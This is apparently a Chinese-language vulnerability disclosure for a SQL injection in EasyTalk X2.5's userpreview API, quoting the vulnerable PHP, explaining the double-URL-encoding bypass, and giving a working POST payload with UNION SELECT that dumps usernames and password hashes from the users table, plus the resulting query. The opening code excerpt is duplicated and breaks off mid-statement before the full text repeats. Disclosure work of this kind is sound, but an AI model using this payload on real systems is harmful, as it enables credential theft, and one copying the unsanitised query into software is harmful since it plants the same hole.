### 简要描述: EasyTalk_X2.5 最新版SQL注入一枚。 ### 详细说明: 漏洞位于/Home/Lib/Action/ApiAction.class.php的 ``` public function userpreview() { $username=trim(rawurldecode($this->_post('username'))); if ($username) { parent::init(); $user = M('Users')->where("user_name='$username'")->find(); if ($user) { if ($user['cityid']) {//用户所在地 $dtModel=M('District'); $pdata = $dtModel->where("id='$user[cityid]'")->find(); $pdata2 = $dtModel->where("id='$pdata[upid]'")->find(); $user['live_city']=$pdata2['name'].' '.$pdata['name']; } $isfriend=D('Friend')->followstatus($user['user_id'],$this->my['user_id']); $f="<span id='followsp2_".$user['user_id']."'>"; if($isfriend[$user['user_id']]==1){ $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico2.gif'> ".L('already_follow')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>"; }else if...
### 简要描述: EasyTalk_X2.5 最新版SQL注入一枚。 ### 详细说明: 漏洞位于/Home/Lib/Action/ApiAction.class.php的 ``` public function userpreview() { $username=trim(rawurldecode($this->_post('username'))); if ($username) { parent::init(); $user = M('Users')->where("user_name='$username'")->find(); if ($user) { if ($user['cityid']) {//用户所在地 $dtModel=M('District'); $pdata = $dtModel->where("id='$user[cityid]'")->find(); $pdata2 = $dtModel->where("id='$pdata[upid]'")->find(); $user['live_city']=$pdata2['name'].' '.$pdata['name']; } $isfriend=D('Friend')->followstatus($user['user_id'],$this->my['user_id']); $f="<span id='followsp2_".$user['user_id']."'>"; if($isfriend[$user['user_id']]==1){ $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico2.gif'> ".L('already_follow')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>"; }else if ($isfriend[$user[user_id]]==3){ $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico.gif'> ".L('follow_followed')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>"; }else{ $f.="<a class='bh' onclick=\"followop('addfollow/user_id/{$user[user_id]}','gz','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('have_a_follow')."</a>"; } $f.="</span>"; if ($user['user_id']==$this->my['user_id']) { $body2=''; } else { $body2='<div class="fleft"><input type="button" value="'.L('send_message').'" onclick="sendprimsgbox(\''.$user['nickname'].'\')" class="button5"> <input type="button" value="@TA" onclick="talkBox(\'@'.$user['nickname'].' \')" class="button5"></div><div class="fright">'.$f.'</div>'; } if(time()-$user['last_login']<=600){ if($user['isadmin']>0){ $zxico='<span class="adminico"> '.L('admin_online').'</span>'; } else { $zxico='<span class="uonlineico"> '.L('user_online').'</span>'; } } else { $zxico='<span class="uofflineico"> '.L('user_offline').'</span>'; } echo '<div class="body1"> <div class="limg"><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank"><img src="'.sethead($user['user_head']).'" width="50px" height="50px"></a></div> <div class="linfo"> <p> <div class="fleft"> <span class="'.setvip($user['user_auth']).'" '.viptitle($user['user_auth']).'><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['nickname'].'</a></span> </div> <div class="fright" style="width:90px;font-size:12px">'.$zxico.'</div> <div class="clearline"></div> </p> <p>'.($user['user_gender']==1?L('male'):L('female')).' '.$user['live_city'].'</p> <p>'.L('follow').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=following" target="_blank">'.$user['follow_num'].'</a> '.L('follower').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=follower" target="_blank">'.$user['followme_num'].'</a> '.L('talk').'<a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['msg_num'].'</a></p> </div> <div class="clearline"></div> <div class="linfo2">'; if ($user['user_auth']) { echo getsubstr($user['auth_info'],0,35); } else { echo L('user_info').':'.getsubstr($user['user_info']?$user['user_info']:L('nothing_write'),0,35); } echo '</div> </div> <div class="body2">'.$body2.'</div>'; } else { echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>'; } } else { echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>'; } } ``` 其中这句代码 $username=trim(rawurldecode($this->_post('username'))); 使用了rawurldecode导致二次注入 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201402/201606133d574497983a9c551612990c2cde3d09.jpg" alt="sql3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/201606133d574497983a9c551612990c2cde3d09.jpg) url为: http://192.168.116.129/easytalk/?m=api&a=userpreview POST数据为: username=my5t3ry%2527/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users%23 最终带入数据库查询语句为: ``` SELECT * FROM `et_users` WHERE user_name='my5t3ry'/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users#' LIMIT 1 ```
